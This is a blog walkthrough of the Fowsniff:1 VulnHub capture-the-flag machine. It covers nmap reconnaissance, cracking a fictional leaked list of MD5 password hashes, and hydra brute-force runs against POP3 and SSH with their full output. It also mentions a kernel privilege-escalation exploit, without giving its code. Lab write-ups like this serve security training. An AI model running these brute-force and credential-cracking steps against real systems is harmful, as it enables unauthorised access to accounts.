This post documents the complete walkthrough of Fowsniff: 1, a boot2root VM created by berzerk0, and hosted at VulnHub. If you are uncomfortable with spoilers, please stop reading now.

On this post

Background

Fowsniff Corp got breached!

WHAT SECURITY? ''~`` ( o o ) +-----.oooO--(_)--Oooo.------+ | | | FOWSNIFF | | got | | PWN3D!!! | | | | .oooO | | ( ) Oooo. | +---------\ (----( )-------+ \\_) ) / (_/ Fowsniff Corp got pwn3d by B1gN1nj4! No one is safe from my 1337 skillz!

Information Gathering

Let’s start with a nmap scan to establish the available services in the host.

# nmap -n -v -Pn -p- -A --reason -oN nmap.txt 192.168.30.129 ... PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 64 OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 90:35:66:f4:c6:d2:95:12:1b:e8:cd:de:aa:4e:03:23 (RSA) | 256 53:9d:23:67:34:cf:0a:d5:5a:9a:11:74:bd:fd:de:71 (ECDSA) |_ 256 a2:8f:db:ae:9e:3d:c9:e6:a9:ca:03:b1:d7:1b:66:83 (ED25519) 80/tcp open http syn-ack ttl 64 Apache httpd 2.4.18 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS | http-robots.txt: 1 disallowed entry |_/ |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Fowsniff Corp - Delivering Solutions 110/tcp open pop3 syn-ack ttl 64 Dovecot pop3d |_pop3-capabilities: RESP-CODES PIPELINING SASL(PLAIN) UIDL USER AUTH-RESP-CODE TOP CAPA 143/tcp open imap syn-ack ttl 64 Dovecot imapd |_imap-capabilities: IDLE more listed LITERAL+ ID post-login have IMAP4rev1 OK capabilities AUTH=PLAINA0001 SASL-IR Pre-login LOGIN-REFERRALS ENABLE

nmap finds 22/tcp , 80/tcp , 110/tcp , 143/tcp . Pretty common services—nothing out of the ordinary. In any case, let’s start with http first.

Here’s what the site looks like.

WTF??!! Are you serious?

Scrolling down, you’ll see what went wrong at Fowsniff Corp.

They are not lying when they say the attackers may release sensitive information through Twitter.

Let’s see what the attackers have to offer.

FOWSNIFF CORP PASSWORD LEAK ''~`` ( o o ) +-----.oooO--(_)--Oooo.------+ | | | FOWSNIFF | | got | | PWN3D!!! | | | | .oooO | | ( ) Oooo. | +---------\ (----( )-------+ \\_) ) / (_/ FowSniff Corp got pwn3d by B1gN1nj4! No one is safe from my 1337 skillz! [email protected]:8a28a94a588a95b80163709ab4313aa4 [email protected]:ae1644dac5b77c0cf51e0d26ad6d7e56 [email protected]:1dc352435fecca338acfd4be10984009 [email protected]:19f5af754c31f1e2651edde9250d69bb [email protected]:90dc16d47114aa13671c697fd506cf26 [email protected]:a92b8a29ef1183192e3d35187e0cfabd [email protected]:0e9588cb62f4b6f27e33d449e2ba0b3b [email protected]:4d6e42f56e127803285a0a7649b5ab11 [email protected]:f7fd98d380735e859f8b2ffbbede5a7e Fowsniff Corporation Passwords LEAKED! FOWSNIFF CORP PASSWORD DUMP! Here are their email passwords dumped from their databases. They left their pop3 server WIDE OPEN, too! MD5 is insecure, so you shouldn't have trouble cracking them but I was too lazy haha =P l8r n00bz! B1gN1nj4 \-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\- This list is entirely fictional and is part of a Capture the Flag educational challenge. All information contained within is invented solely for this purpose and does not correspond to any real persons or organizations. Any similarities to actual people or entities is purely coincidental and occurred accidentally.

Password Recovery

Let’s recover the passwords from those hashes with John the Ripper. Yummy!

Eight out of nine recovered. Impressive.

Password Verification

Now, let’s verify who has access to what with hydra .

# hydra -L usernames.txt -P passwords.txt -e nsr pop3://192.168.30.129 Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-24 09:19:19 [INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal! [DATA] max 16 tasks per 1 server, overall 16 tasks, 96 login tries (l:8/p:12), ~6 tries per task [DATA] attacking pop3://192.168.30.129:110/ [110][pop3] host: 192.168.30.129 login: seina password: scoobydoo2 [STATUS] 96.00 tries/min, 96 tries in 00:01h, 1 to do in 00:01h, 16 active 1 of 1 target successfully completed, 1 valid password found Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-24 09:20:29

Hmm. Someone didn’t change their password after the breach.

Popping Emails

I know it’s unethical to read other’s email but the temptation is too great. Can’t help it, let’s read seina ’s email then.

Now now now, what do we have here? SSH password??!!

Password Verification Redux

Let’s see who hasn’t change their password.

# hydra -L usernames.txt -p 'S1ck3nBluff+secureshell' ssh://192.168.30.129 Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-24 09:28:53 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 8 tasks per 1 server, overall 8 tasks, 8 login tries (l:8/p:1), ~1 try per task [DATA] attacking ssh://192.168.30.129:22/ [22][ssh] host: 192.168.30.129 login: baksteen password: S1ck3nBluff+secureshell 1 of 1 target successfully completed, 1 valid password found Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-24 09:28:55

Caught in action. baksteen is in trouble.

Low-Privilege Shell

Armed with the SSH password, let’s give ourselves a low-privilege shell.

Boom. I’m in.

Privilege Escalation

During enumeration of baksteen ’s account, I notice the kernel (4.4.0-116-generic) is vulnerable to a local privilege escalation exploit.

gcc is also not installed on fowsniff . No problem. I can compile the exploit on my attacking machine and transfer it over with scp .

Damn. This is too easy.

What’s the Flag?